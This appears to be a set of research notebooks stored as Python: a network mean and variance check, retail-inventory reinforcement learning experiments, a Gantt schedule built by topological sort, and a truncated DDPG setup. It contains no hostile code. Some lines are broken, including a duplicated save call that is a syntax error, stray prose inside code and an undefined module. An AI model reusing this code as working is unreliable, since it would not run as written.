first_part.cuda(device.index)
relu.cuda(device.index)
second_part.cuda(device.index)
def model(x):
return second_part(relu(first_part(x)))
# variables
A, c1 = nm.utils.linearize(first_part, x)
B, c2 = nm.utils.linearize(second_part, relu(first_part(x)).detach())
x.requires_grad_(False)
A.squeeze_()
c1.squeeze_()
B.squeeze_()
c2.squeeze_()
# analytical output mean and variance
mean = x.view(-1)
covariance = rand.definite(size, norm=0.1, dtype=dtype, device=device)
out_mu = gnm.mean(mean, covariance, A, c1, B, c2)
out_var = gnm.special_variance(covariance, A, B)
# Monte-Carlo estimation of the output mean and variance
normal = torch.distributions.MultivariateNormal(mean, covariance)
samples = normal.sample((count,))
out_samples = model(samples.view(-1, *image_size)).detach()
mc_mu = torch.mean(out_samples, dim=0)
mc_var = torch.var(out_samples, dim=0)
# printing the ratios
print('Monte-Carlo mean / Analytical mean:')
print((mc_mu / out_mu).cpu().numpy())
print('Monte-Carlo variance / Analytical variance:')
print((mc_var / out_var).cpu().numpy())
|
static/tightness.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# ---
# # Experiments
#
# Here, we compare standard baselines to imitation learning and RL-based methods. Please read the readme first.
# +
#First, we import our libraries and define the neural net model used for DQN.
#We specify store hyperparameters then build the training function for our agent
import torch.nn as nn
import torch
from retail import retail
import torch.distributions as d
import torch.nn.functional as F
import numpy as np
bucket_customers = torch.tensor([800.,400.,500.,900.])
from rlpyt.algos.dqn.dqn import DQN
from rlpyt.agents.pg.categorical import CategoricalPgAgent
from rlpyt.agents.dqn.dqn_agent import DqnAgent
from rlpyt.samplers.serial.sampler import SerialSampler
from rlpyt.agents.dqn.dqn_agent import DqnAgent
from rlpyt.runners.minibatch_rl import MinibatchRlEval
from rlpyt.utils.logging.context import logger_context
from rlpyt.samplers.parallel.cpu.sampler import CpuSampler
from rlpyt.algos.pg.ppo import PPO
from rlpyt.agents.pg.gaussian import GaussianPgAgent
torch.set_default_tensor_type(torch.FloatTensor)
class DQNModel(torch.nn.Module):
def __init__(
self,
input_size,
conv_size,
hidden_sizes,
n_kernels,
output_size=None,
nonlinearity=torch.nn.SELU,
):
super().__init__()
self._conv_size = conv_size
self._char_size = input_size-conv_size
self.normL = torch.nn.LayerNorm(input_size)
self._transf_in_size = input_size-conv_size+n_kernels
self.activ = nn.SELU()
if isinstance(hidden_sizes, int):
hidden_sizes = [hidden_sizes]
hidden_layers = [torch.nn.Linear(n_in, n_out) for n_in, n_out in
zip([self._transf_in_size] + hidden_sizes[:-1], hidden_sizes)]
sequence = list()
for layer in hidden_layers:
sequence.extend([layer, nonlinearity(), torch.nn.LayerNorm(layer.out_features)])
if output_size is not None:
last_size = hidden_sizes[-1] if hidden_sizes else input_size
sequence.append(torch.nn.Linear(last_size, output_size))
self.convs = torch.nn.Conv1d(1, out_channels = n_kernels, kernel_size = 1)
self.model = torch.nn.Sequential(*sequence)
self._output_size = (hidden_sizes[-1] if output_size is None
else output_size)
def forward(self, o, action, reward):
oprime = self.normL(o)
stock, characteristics = o.split([self._conv_size,self._char_size],-1)
stock_summary = self.convs(stock.view(-1,1,self._conv_size)).mean(2)
if len(characteristics.shape)>2:
stock_summary.unsqueeze_(1)
summarized_input = torch.cat((self.activ(stock_summary), characteristics),-1)
out = self.model(summarized_input)
return out
@property
def output_size(self):
return self._output_size
kwargsStore= {'assortment_size': 1, 'utility_weights' :{'alpha': 1., 'beta': 1., 'gamma': 1.},
'max_stock': 1000, 'forecastVariance' :0.000, 'horizon': 730, 'lead_time': 1}
kwargsModel = {'input_size': 1006, 'hidden_sizes': [100,200, 500, 1000], 'conv_size': 1000, 'n_kernels': 50}
def build_and_train(run_ID=1, cuda_idx=None, env_kwargs = None, mid_batch_reset = False,
n_parallel = 1, model_kwargs=None, initial_model_state_dict = None):
affinity = dict(workers_cpus=list(range(n_parallel)))
sampler = CpuSampler(
EnvCls= retail.StoreEnv,
env_kwargs = env_kwargs,
eval_env_kwargs = env_kwargs,
batch_T=20,
batch_B=2,
max_decorrelation_steps=10,
eval_n_envs=1,
eval_max_steps=int(20e4),
eval_max_trajectories=24
)
algo = DQN(learning_rate=5e-5,discount=.99, replay_ratio=8, batch_size = 16)
agent = DqnAgent(ModelCls=DQNModel, model_kwargs=model_kwargs)
runner = MinibatchRlEval(
algo=algo,
agent=agent,
sampler=sampler,
n_steps=10e4,
log_interval_steps=1e3,
affinity=affinity )
name = "dqn"
log_dir = "experiments"
config = None
runner.train()
dic = agent.state_dict()
torch.save(dic,'dqn-lt1.pt')
# +
#Next, we simply train our DQN agent.
build_and_train(
run_ID=10,
env_kwargs = kwargsStore,
model_kwargs = kwargsModel)
# +
# We define the network for PPO, then its parameter and training function
class NewPPO(torch.nn.Module):
def __init__(
self,
input_size,
conv_size,
hidden_sizes,
n_kernels,
output_size=None,
nonlinearity=torch.nn.SELU,
):
super().__init__()
self._conv_size = conv_size
self._char_size = input_size-conv_size
self.normL = torch.nn.LayerNorm(input_size)
self._transf_in_size = input_size-conv_size+n_kernels
self.activ = nn.SELU()
if isinstance(hidden_sizes, int):
hidden_sizes = [hidden_sizes]
hidden_layers = [torch.nn.Linear(n_in, n_out) for n_in, n_out in
zip([self._transf_in_size] + hidden_sizes[:-1], hidden_sizes)]
sequence = list()
for layer in hidden_layers:
sequence.extend([layer, nonlinearity(), torch.nn.LayerNorm(layer.out_features)])
if output_size is not None:
last_size = hidden_sizes[-1] if hidden_sizes else input_size
sequence.append(torch.nn.Linear(last_size, output_size))
self.convs = torch.nn.Conv1d(1, out_channels = n_kernels, kernel_size = 1)
self.model = torch.nn.Sequential(*sequence)
self._output_size = (hidden_sizes[-1] if output_size is None
else output_size)
def forward(self, o, action, reward):
oprime = self.normL(o)
stock, characteristics = o.split([self._conv_size,self._char_size],-1)
stock_summary = self.convs(stock.view(-1,1,self._conv_size)).mean(2)
if len(characteristics.shape)>2:
stock_summary.unsqueeze_(1)
summarized_input = torch.cat((self.activ(stock_summary), characteristics),-1)
out = self.model(summarized_input).squeeze()
return out.split(1, dim = -1)
@property
def output_size(self):
return self._output_size
kwargsStore= {'assortment_size': 1, 'symmetric_action_space': True,
'max_stock': 1000, 'forecastVariance' :0.000, 'horizon': 730, 'lead_time': 1}
kwargsModel = {'input_size': 1006, 'hidden_sizes': [100,200,100],
'output_size': 3, 'conv_size': 1000, 'n_kernels': 50}
def build_and_train(run_ID=1, cuda_idx=None, env_kwargs = None,
mid_batch_reset = False, n_parallel = 1,model_kwargs=None):
affinity = dict(workers_cpus=list(range(n_parallel)))
sampler = CpuSampler(
EnvCls= retail.StoreEnv,
env_kwargs = env_kwargs,
eval_env_kwargs = env_kwargs,
batch_T=20,
batch_B=1,
max_decorrelation_steps=20,
eval_n_envs=100,
eval_max_steps=int(10e4),
eval_max_trajectories=20)
algo = PPO(learning_rate = 1e-5, discount=.99, value_loss_coeff=.2,
normalize_advantage = True, ratio_clip = .5)
agent = GaussianPgAgent(ModelCls=NewPPO, model_kwargs=kwargsModel)
runner = MinibatchRlEval(
algo=algo,
agent=agent,
sampler=sampler,
n_steps=1e5,
log_interval_steps=1e3,
affinity=affinity
)
name = "pg"
log_dir = "experiments"
config = None
runner.train()
dic = agent.state_dict()
torch.save(dic,'ppo-lt1.pt')-ppo-lt1.pt')
# -
#We then train our PPO based agent
build_and_train(
run_ID=11,
env_kwargs = kwargsStore,
model_kwargs = kwargsModel)
#We collect results for the forecast based policy
rewards_forecast_order = []
for i in range(100):
ra = []
done = False
kwargsStore= {'assortment_size': 250, 'lead_time': 1,
'max_stock': 1000, 'seed': i, 'forecastVariance' :0.000, 'horizon': 500}
store = retail.StoreEnv(**kwargsStore)
while not (done):
customers = bucket_customers.sum()
p = store.forecast.squeeze()
std = torch.sqrt(customers*p+(1-p))
order = F.relu(3*std+store.forecast.squeeze()*customers-store.get_full_inventory_position()).round()
obs = store.step(order.numpy())
ra.append(obs[1])
done = obs[2]
rewards_forecast_order.append(torch.stack(ra).mean())
# +
#Same for the fixed order rate
rewards_sq_policy = []
for i in range(100):
ra = []
done = False
kwargsStore= {'assortment_size': 250, 'lead_time': 1,
'max_stock': 1000, 'seed': i, 'forecastVariance' :0.000, 'horizon': 500}
store = retail.StoreEnv(**kwargsStore)
while not (done):
order = F.relu(2*store.assortment.base_demand*bucket_customers.max()-store.get_full_inventory_position()).round()
obs = store.step(order.numpy())
ra.append(obs[1])
done = obs[2]
rewards_sq_policy.append(torch.stack(ra).mean())
# +
#Now, we recover our DQN network and collect results
kwargsModel = {'input_size': 1006, 'hidden_sizes': [100,200, 500, 1000], 'conv_size': 1000, 'n_kernels': 50}
newDic= torch.load('dqn-lt1.pt',map_location=torch.device('cpu'))
model = DQNModel(**kwargsModel)
model.load_state_dict(newDic['model'])
rewards_dqn = []
for i in range(100):
print(i)
ra = []
done = False
kwargsStore= {'assortment_size': 250, 'lead_time': 1,
'max_stock': 1000, 'seed': i, 'forecastVariance' :0.000, 'horizon': 500}
store = retail.StoreEnv(**kwargsStore)
while not (done):
mu = model(store.get_obs(),5, 10).max(1)[1]
obs = store.step(mu.detach().numpy())
ra.append(obs[1])
done = obs[2]
rewards_dqn.append(torch.stack(ra).mean())
# +
#Same for PPO
kwargsModel = {'input_size': 1006, 'hidden_sizes': [100,200,100],
'output_size': 3, 'conv_size': 1000, 'n_kernels': 50}
newDic= torch.load('ijcai_genplan-ppo-lt1.pt',map_location=torch.device('cpu'))
model = NewPPO(**kwargsModel)
model.load_state_dict(newDic)
rewards_ppo = []
for i in range(100):
ra = []
done = False
kwargsStore= {'assortment_size': 250, 'lead_time': 1,'symmetric_action_space': True,
'max_stock': 1000, 'seed': i, 'forecastVariance' :0.000, 'horizon': 500}
store = retail.StoreEnv(**kwargsStore)
while not (done):
mu, sigma, value = model(store.get_obs(),5, 10)
obs = store.step(mu.detach().numpy())
ra.append(obs[1])
done = obs[2]
rewards_ppo.append(torch.stack(ra).mean())
print(torch.stack(ra).mean())
# +
#We now move to imitation learning. We collect samples from a policy
actionList = []
observations = []
rewards = []
#Here, the seed ensure that we do not mix train and test
for i in range(101,1101):
ra = []
done = False
kwargsStore= {'assortment_size': 1, 'lead_time': 1,
'max_stock': 1000, 'seed': i, 'forecastVariance' :0.000, 'horizon': 500}
store = retail.StoreEnv(**kwargsStore)
while not (done):
observations.append(store.get_obs())
customers = bucket_customers.sum()
p = store.forecast.squeeze()
std = torch.sqrt(customers*p+(1-p))
order = F.relu(3*std+store.forecast.squeeze()*customers-store.get_full_inventory_position()).round()
obs = store.step(order.numpy())
ra.append(obs[1])
actionList.append(order)
done = obs[2]
rewards += ra
# -
from torch.utils.data import Dataset, DataLoader
class ClassicDataSet(Dataset):
def __init__(self, x, y, r):
self._x = x
self._y = y
self._r = r
self._len = x.shape[0]
def __len__(self):
return(self._len)
def __getitem__(self, index):
return(self._x[index], self._y[index], self._r[index])
# +
y = torch.stack(actionList)
x = torch.stack(observations)
r = torch.stack(rewards)
action_reaction = ClassicDataSet(x, y, r)
data_loader = DataLoader(action_reaction, batch_size=128,
shuffle=True, num_workers=2)
# -
#Now, we simply need to replicate this policy. The neural network used is the same as PPO
kwargsPPO = {'input_size': 1006, 'hidden_sizes': [100,200,100],
'output_size': 3, 'conv_size': 1000, 'n_kernels': 50}
newNet = NewPPO(**kwargsPPO)
criterion = nn.MSELoss()
optimizer = torch.optim.Adam(newNet.parameters(), lr=1e-3)
for epoch in range(20):
# Training
s = 0
s2 = 0
for data, target, reward in (data_loader):
net_out = newNet(data,0,0)
loss = criterion(net_out[0], target)
s += loss
loss.backward()
optimizer.step()
optimizer.zero_grad()
print(s)
name = 'imitationLearning.pt'
torch.save(newNet.state_dict(),name)
# +
#We now collect rewards from the imitating neural network
rewards_imitation = []
for i in range(100):
print(i)
ra = []
done = False
kwargsStore= {'assortment_size': 250, 'lead_time': 1,
'max_stock': 1000, 'seed': i, 'forecastVariance' :0.000, 'horizon': 500}
store = env_rlpyt.StoreEnv(**kwargsStore)
while not (done):
mu, sigma, value = newNet(store.get_obs(),5, 10)
obs = store.step(mu.detach().numpy())
ra.append(obs[1])
done = obs[2]
rewards_imitation.append(torch.stack(ra).mean())
# -
We can plot a histogram
import matplotlib.pyplot as plt
import seaborn as sns
sns.kdeplot(torch.stack(rewards_dqn).numpy())
# We can now save the results. It's easy to compute the mean or the std over the obtained sample.
# +
baseline_csv = torch.stack((torch.stack(rewards_sq_policy), torch.stack(rewards_forecast_order))).numpy()
rl_csv = torch.stack((torch.stack(rewards_dqn), torch.stack(rewards_ppo), torch.stack(rewards_imitation))).numpy()
np.savetxt("baseline_results.csv", baseline_csv, delimiter=",")
np.savetxt("rl_results.csv", rl_csv, delimiter=",")
|
notebooks/Experiments.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python [conda env:.conda-gisenv] *
# language: python
# name: conda-env-.conda-gisenv-py
# ---
from collections import defaultdict
import pandas as pd
import os
import math
#myfolder=r'F:\website\cmis6\Civilworks cost\Work Schedule' #office computer
myfolder=r'E:\Website_26_07_2020\cmis6\Civilworks cost\Work Schedule' #home computer
inputpath=os.path.join(myfolder,'Schdule Input.xlsx')
class GanttBar:
def __init__(self,start,duration):
self.start_day=start
self.duration=duration
self.finish_day=self.start_day+self.duration
def addTaskUnit(self,unit):
self.taskUnit=unit
def addTaskVolume(self,volume):
self.taskVolume=volume
self.productionRate=math.ceil(self.taskVolume/self.duration)
# +
"""Class to represent graph"""
class Graph:
def __init__(self,vertices):
self.graph=defaultdict(list)
self.V=vertices
self.indeg0=[True]*(self.V+1)
self.outdeg0=[True]*(self.V+1)
self.edges=[]
self.adj=defaultdict(list)
self.visited=[False]*(self.V+1)
self.path=[]
self.durations=[]
self.taskchains=[]
self.tc_durations=[]
self.minimum_start_date=[0]*self.V
# function to add an edge to graph
def addEdge(self,u,v):
self.graph[u].append(v)
edge=(u,v)
print(edge)
self.edges.append(edge)
# set indeg0[v] <- false
self.indeg0[v] = False
# set outdeg0[u] <- false
self.outdeg0[u] = False
#print(self.graph[u])
# A recursive function used by topologicalSort
def topologicalSortUtil(self,v,visited,stack):
#mark the current node as visited
visited[v]=True
# Recur for all the vertices adjacent to this vertex
for i in self.graph[v]:
if visited[i]==False:
self.topologicalSortUtil(i,visited,stack)
# Mark the current node as visited.
stack.insert(0,v)
# The function to do Topological Sort. It uses recursive
# topologicalSortUtil()
def topologicalSort(self):
# Mark all the vertices as not visited
visited=[False]*(self.V+1)
stack=[]
# Call the recursive helper function to store Topological
# Sort starting from all vertices one by one
for i in range(self.V):
if visited[i]==False:
self.topologicalSortUtil(i,visited,stack)
print (stack)
def displayGraph(self):
print("number of vertices={}".format(self.V))
print(self.graph)
print("indegree={}".format(self.indeg0))
print("outdegree={}".format(self.outdeg0))
print("edges of the graph......")
print(self.edges)
print("durations of tasks")
print(self.durations)
def dfs(self,s):
k=0
#append the node in path
#and set visited
self.path.append(s)
self.visited[s]=True
# Path started with a node
# having in-degree 0 and
# current node has out-degree 0,
# print current path
if self.outdeg0[s] and self.indeg0[self.path[0]]:
print(*self.path)
self.taskchains.append(list(self.path))
#for p in self.path:
#self.taskchains[k].append(p)
#myvalue[k]=self.path
#
k=k+1
#print(myvalue)
# Recursive call to print all paths
for node in self.graph[s]:
if not self.visited[node]:
self.dfs(node)
# Remove node from path
# and set unvisited
#return self.path
#print(self.path)
#self.taskchains[s]=self.path
self.path.pop()
self.visited[s]=False
#return myvalue
def print_all_paths(self):
for i in range(self.V):
if self.indeg0[i] and self.graph[i]:
self.path=[]
self.visited=[False]*(self.V+1)
self.dfs(i)
#print("path={}".format(p))
def addDurations(self,duration_list):
self.durations=duration_list
def findPathdurations(self,path):
total_duration=0
for p in path:
total_duration +=self.durations[p-1]
return total_duration
def findPathCumulativeDurations(self,path):
total_duration=0
path_cum=[]
for p in path:
total_duration +=self.durations[p-1]
path_cum.append(total_duration)
self.tc_durations.append(path_cum)
#return path_cum
def findStratDateofTasks(self):
for T in range(1,self.V+1):
d=self.findMinimumStartDateOfTask(T)
print("Task-{} sdate={}".format(T,d))
self.minimum_start_date[T-1]=d
def findMinimumStartDateOfTask(self,T):
d=self.durations[T-1]
duration_list=[]
for tc,tcd in zip(self.taskchains,self.tc_durations):
if T in tc:
index=tc.index(T)
sdate=tcd[index]-d+1
duration_list.append(sdate)
#print("task found in={}".format(index))
#print("chain={} duration={}".format(tc,tcd))
#print("duration of tasks no={} total_time={}".format(T,d))
max_start_date=max(duration_list)
return max_start_date
def calculateStartOfAllTasks(self):
for chain in self.taskchains:
#duration=self.findPathdurations(chain)
self.findPathCumulativeDurations(chain)
def scheduleTask(self):
self.topologicalSort()
#self.displayGraph()
self.print_all_paths()
print(self.taskchains)
for chain in self.taskchains:
#duration=self.findPathdurations(chain)
self.findPathCumulativeDurations(chain)
#self.calculateStartOfAllTasks()
#print(self.tc_durations)
self.findStratDateofTasks()
self.findProjectDuration()
def createGanttSchedule(self):
mytasks=[]
for i in range(1,self.V+1):
duration=self.durations[i-1]
sday=self.minimum_start_date[i-1]
bar=GanttBar(sday,duration)
mytasks.append(bar)
return mytasks
def findProjectDuration(self):
project_durations=[]
for tcd in self.tc_durations:
dmax=max(tcd)
#print(dmax)
project_durations.append(dmax)
self.finishDay=max(project_durations)
# +
#Python program to print topological sorting of a DAG
from collections import defaultdict
#Class to represent a graph
class Graph2:
def __init__(self,vertices):
self.graph = defaultdict(list) #dictionary containing adjacency List
self.V = vertices #No. of vertices
# function to add an edge to graph
def addEdge(self,u,v):
self.graph[u].append(v)
# A recursive function used by topologicalSort
def topologicalSortUtil(self,v,visited,stack):
# Mark the current node as visited.
visited[v] = True
# Recur for all the vertices adjacent to this vertex
for i in self.graph[v]:
if visited[i] == False:
self.topologicalSortUtil(i,visited,stack)
# Push current vertex to stack which stores result
stack.insert(0,v)
# The function to do Topological Sort. It uses recursive
# topologicalSortUtil()
def topologicalSort(self):
# Mark all the vertices as not visited
visited = [False]*self.V
stack =[]
# Call the recursive helper function to store Topological
# Sort starting from all vertices one by one
for i in range(self.V):
if visited[i] == False:
self.topologicalSortUtil(i,visited,stack)
# Print contents of stack
print (stack )
# +
g= Graph(6)
g.addEdge(5, 2);
g.addEdge(5, 0);
g.addEdge(4, 0);
g.addEdge(4, 1);
g.addEdge(2, 3);
g.addEdge(3, 1);
print ("Following is a Topological Sort of the given graph")
g.topologicalSort()
# +
def text2List(input_text):
split_text=input_text.split(',')
output_list=[int(x) for x in split_text ]
return output_list
def buildGraph(input_df):
shape=input_df.shape
g=Graph(shape[0])
print(shape)
for index,row in input_df.iterrows():
v=row['TaskNo']
if row['Predecessor']!=-1:
pred_text=str(row['Predecessor'])
length=len(pred_text)
if length >1:
sources=text2List(pred_text)
#print(sources)
else:
sources=[int(pred_text)]
#print("sources={}".format(sources))
for u in sources:
g.addEdge(u,v)
#print("predecosseo no={} value={}".format(length,pred_text))
#print(len(pred_text))
#print(pred_text)
duration_list=list(input_df['Duration'])
g.addDurations(duration_list)
return g
# -
sheetName='WBS'
myframe=pd.read_excel(inputpath,sheet_name=sheetName)
myframe.fillna(0,inplace=True)
myframe
g=buildGraph(myframe)
g. scheduleTask()
print(g.finishDay)
mybars=g.createGanttSchedule()
g.findProjectDuration()
g.findProjectDuration()
# +
g.topologicalSort()
g.displayGraph()
g.print_all_paths()
# -
mybars
print(g.durations)
for chain in g.taskchains:
duration=g.findPathdurations(chain)
cum=g.findPathCumulativeDurations(chain)
print("tasks={} total duration={}".format(chain,duration))
print("tasks={} cumdistance={}".format(chain, cum))
print( g.tc_durations[1])
max_date=g.findMinimumStartDateOfTask(9)
g.findStratDateofTasks()
print(g.minimum_start_date)
|
Civilworks cost/Work Schedule/simple_gannt_schedule.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# +
import os
import tensorflow as tf
import numpy as np
import roboschool
import gym
from gym import wrappers
import tflearn
import argparse
import pprint as pp
from replay_buffer import ReplayBuffer
import logging
from tensorflow.python.client import device_lib
def get_available_devices():
local_device_protos = device_lib.list_local_devices()
return [x.name for x in local_device_protos if x.device_type == 'GPU' or x.device_type=='CPU']
tf_availale_devices = get_available_devices()
print(tf_availale_devices)
# ===========================
# Actor and Critic DNNs
# ===========================
class ActorNetwork(object):
"""
Input to the network is the state, output is the action
under a deterministic policy.
The output layer activation is a tanh to keep the action
between -action_bound and action_bound
"""
def __init__(self, sess, continuous_act_space_flag, state_dim, action_dim, action_bound, learning_rate, tau, batch_size):
self.sess = sess
self.continuous_act_space_flag = continuous_act_space_flag
self.s_dim = state_dim
self.a_dim = action_dim
self.action_bound = action_bound
self.learning_rate = learning_rate
self.tau = tau
self.batch_size = batch_size
# Actor Network
self.inputs, self.out, self.scaled_out = self.create_actor_network()
self.network_params = tf.trainable_variables()
# Target Network
self.target_inputs, self.target_out, self.target_scaled_out = self.create_actor_network()
self.target_network_params = tf.trainable_variables()[
len(self.network_params):]
# Op for periodically updating target network with online network
# weights
self.update_target_network_params = \
[self.target_network_params[i].assign(tf.multiply(self.network_params[i], self.tau) +
tf.multiply(self.target_network_params[i], 1. - self.tau))
for i in range(len(self.target_network_params))]
# This gradient will be provided by the critic network
self.action_gradient = tf.placeholder(tf.float32, [None, self.a_dim])
# Combine the gradients here
self.unnormalized_actor_gradients = tf.gradients(
self.scaled_out, self.network_params, -self.action_gradient)
self.actor_gradients = list(map(lambda x: tf.div(x, self.batch_size), self.unnormalized_actor_gradients))
# Optimization Op
self.optimize = tf.train.AdamOptimizer(self.learning_rate).\
apply_gradients(zip(self.actor_gradients, self.network_params))
self.num_trainable_vars = len(
self.network_params) + len(self.target_network_params)
def create_actor_network(self):
inputs = tflearn.input_data(shape=[None, self.s_dim])
net = tflearn.fully_connected(inputs, 400)
net = tflearn.layers.normalization.batch_normalization(net)
net = tflearn.activations.relu(net)
net = tflearn.fully_connected(net, 300)
net = tflearn.layers.normalization.batch_normalization(net)
net = tflearn.activations.relu(net)
# Final layer weights are init to Uniform[-3e-3, 3e-3]
w_init = tflearn.initializations.uniform(minval=-0.003, maxval=0.003)
# If Actor acts on discrete action space, use Softmax
if self.continuous_act_space_flag is True:
out = tflearn.fully_connected(
net, self.a_dim, activation='tanh', weights_init=w_init)
else:
out = tflearn.fully_connected(
net, self.a_dim, activation='softmax', weights_init=w_init)
# Scale output to -action_bound to action_bound
scaled_out = tf.multiply(out, self.action_bound)
return inputs, out, scaled_out
def train(self, inputs, a_gradient):
self.sess.run(self.optimize, feed_dict={
self.inputs: inputs,
self.action_gradient: a_gradient
})
def predict(self, inputs):
return self.sess.run(self.scaled_out, feed_dict={
self.inputs: inputs
})
def predict_target(self, inputs):
return self.sess.run(self.target_scaled_out, feed_dict={
self.target_inputs: inputs
})
def update_target_network(self):
self.sess.run(self.update_target_network_params)
def get_num_trainable_vars(self):
return self.num_trainable_vars
class CriticNetwork(object):
"""
Input to the network is the state and action, output is Q(s,a).
The action must be obtained from the output of the Actor network.
"""
def __init__(self, sess, state_dim, action_dim, learning_rate, tau, gamma, num_actor_vars):
self.sess = sess
self.s_dim = state_dim
self.a_dim = action_dim
self.learning_rate = learning_rate
self.tau = tau
self.gamma = gamma
# Create the critic network
self.inputs, self.action, self.out = self.create_critic_network()
self.network_params = tf.trainable_variables()[num_actor_vars:]
# Target Network
self.target_inputs, self.target_action, self.target_out = self.create_critic_network()
self.target_network_params = tf.trainable_variables()[(len(self.network_params) + num_actor_vars):]
# Op for periodically updating target network with online network
# weights with regularization
self.update_target_network_params = \
[self.target_network_params[i].assign(tf.multiply(self.network_params[i], self.tau) \
+ tf.multiply(self.target_network_params[i], 1. - self.tau))
for i in range(len(self.target_network_params))]
# Network target (y_i)
self.predicted_q_value = tf.placeholder(tf.float32, [None, 1])
# Define loss and optimization Op
self.loss = tflearn.mean_square(self.predicted_q_value, self.out)
self.optimize = tf.train.AdamOptimizer(
self.learning_rate).minimize(self.loss)
# Get the gradient of the net w.r.t. the action.
# For each action in the minibatch (i.e., for each x in xs),
# this will sum up the gradients of each critic output in the minibatch
# w.r.t. that action. Each output is independent of all
# actions except for one.
self.action_grads = tf.gradients(self.out, self.action)
def create_critic_network(self):
inputs = tflearn.input_data(shape=[None, self.s_dim])
action = tflearn.input_data(shape=[None, self.a_dim])
# TODO
powerful_critic = True
if powerful_critic is True:
net = tflearn.fully_connected(inputs, 400)
net = tflearn.layers.normalization.batch_normalization(net)
net = tflearn.activations.relu(net)
# Add the action tensor in the 2nd hidden layer
# Use two temp layers to get the corresponding weights and biases
t1 = tflearn.fully_connected(net, 300)
t2 = tflearn.fully_connected(action, 300)
net = tflearn.activation(
tf.matmul(net, t1.W) + tf.matmul(action, t2.W) + t2.b, activation='relu')
else:
net = tflearn.fully_connected(inputs, 400)
net = tflearn.layers.normalization.batch_normalization(net)
net = tflearn.activations.relu(net)
# Add the action tensor in the 2nd hidden layer
# Use two temp layers to get the corresponding weights and biases
t1 = tflearn.fully_connected(net, 600)
t2 = tflearn.fully_connected(action, 600)
net = tflearn.activation(
tf.matmul(net, t1.W) + tf.matmul(action, t2.W) + t2.b, activation='relu')
# # Add the action tensor in the 2nd hidden layer
# # Use two temp layers to get the corresponding weights and biases
# t1 = tflearn.fully_connected(inputs, 300)
# t2 = tflearn.fully_connected(action, 300)
#
# net = tflearn.activation(
# tf.matmul(inputs, t1.W) + tf.matmul(action, t2.W) + t2.b, activation='relu')
# linear layer connected to 1 output representing Q(s,a)
# Weights are init to Uniform[-3e-3, 3e-3]
w_init = tflearn.initializations.uniform(minval=-0.003, maxval=0.003)
out = tflearn.fully_connected(net, 1, weights_init=w_init)
return inputs, action, out
def train(self, inputs, action, predicted_q_value):
return self.sess.run([self.out, self.optimize], feed_dict={
self.inputs: inputs,
self.action: action,
self.predicted_q_value: predicted_q_value
})
def predict(self, inputs, action):
return self.sess.run(self.out, feed_dict={
self.inputs: inputs,
self.action: action
})
def predict_target(self, inputs, action):
return self.sess.run(self.target_out, feed_dict={
self.target_inputs: inputs,
self.target_action: action
})
def action_gradients(self, inputs, actions):
return self.sess.run(self.action_grads, feed_dict={
self.inputs: inputs,
self.action: actions
})
def update_target_network(self):
self.sess.run(self.update_target_network_params)
# Taken from https://github.com/openai/baselines/blob/master/baselines/ddpg/noise.py, which is
# based on http://math.stackexchange.com/questions/1287634/implementing-ornstein-uhlenbeck-in-matlab
class OrnsteinUhlenbeckActionNoise:
def __init__(self, mu, sigma=0.3, theta=.15, dt=1e-2, x0=None):
self.theta = theta
self.mu = mu
self.sigma = sigma
self.dt = dt
self.x0 = x0
self.reset()
def __call__(self):
x = self.x_prev + self.theta * (self.mu - self.x_prev) * self.dt + \
self.sigma * np.sqrt(self.dt) * np.random.normal(size=self.mu.shape)
self.x_prev = x
return x
def reset(self):
self.x_prev = self.x0 if self.x0 is not None else np.zeros_like(self.mu)
def __repr__(self):
return 'OrnsteinUhlenbeckActionNoise(mu={}, sigma={})'.format(self.mu, self.sigma)
# ===========================
# Tensorflow Summary Ops
# ===========================
def build_summaries():
episode_reward = tf.Variable(0.)
tf.summary.scalar("Reward", episode_reward)
episode_ave_max_q = tf.Variable(0.)
tf.summary.scalar("Qmax_Value", episode_ave_max_q)
summary_vars = [episode_reward, episode_ave_max_q]
summary_ops = tf.summary.merge_all()
return summary_ops, summary_vars
# ===========================
# Agent Training
# ===========================
def train(sess, env, args, actor, critic, actor_noise):
# Set up summary Ops
summary_ops, summary_vars = build_summaries()
sess.run(tf.global_variables_initializer())
writer = tf.summary.FileWriter(args['summary_dir'], sess.graph)
# Initialize target network weights
actor.update_target_network()
critic.update_target_network()
# Epsilon parameter
epsilon = args['epsilon_max']
# Initialize replay memory
replay_buffer = ReplayBuffer(int(args['buffer_size']), int(args['random_seed']))
# Time step
time_step = 0.
# Needed to enable BatchNorm.
# This hurts the performance on Pendulum but could be useful
# in other environments.
# tflearn.is_training(True)
for i in range(int(args['max_episodes'])):
s = env.reset()
ep_reward = 0
ep_ave_max_q = 0
ep_steps = 0
while True:
if args['render_env_flag']:
env.render()
# Added exploration noise
#a = actor.predict(np.reshape(s, (1, 3))) + (1. / (1. + i))
# TODO: different exploration strategy
a = []
action = []
exploration_strategy = args['exploration_strategy']
if exploration_strategy == 'action_noise':
a = actor.predict(np.reshape(s, (1, actor.s_dim))) + actor_noise()
# Convert continuous action into discrete action
if args['continuous_act_space_flag'] is True:
action = a[0]
else:
action = np.argmax(a[0])
elif exploration_strategy == 'epsilon_greedy':
if np.random.rand() < epsilon:
if args['continuous_act_space_flag'] is True:
a = np.reshape(env.action_space.sample(), (1, actor.a_dim))
else:
a = np.random.uniform(0, 1, (1, actor.a_dim))
else:
a = actor.predict(np.reshape(s, (1, actor.s_dim)))
# Convert continuous action into discrete action
if args['continuous_act_space_flag'] is True:
action = a[0]
else:
action = np.argmax(a[0])
else:
print('Please choose a proper exploration strategy!')
s2, r, terminal, info = env.step(action)
replay_buffer.add(np.reshape(s, (actor.s_dim,)), np.reshape(a, (actor.a_dim,)), r,
terminal, np.reshape(s2, (actor.s_dim,)))
# Reduce epsilon
time_step += 1.
epsilon = args['epsilon_min'] + (args['epsilon_max'] - args['epsilon_min']) * np.exp(-args['epsilon_decay'] * time_step)
# Keep adding experience to the memory until
# there are at least minibatch size samples
if replay_buffer.size() > int(args['minibatch_size']):
s_batch, a_batch, r_batch, t_batch, s2_batch = \
replay_buffer.sample_batch(int(args['minibatch_size']))
if args['double_ddpg_flag']:
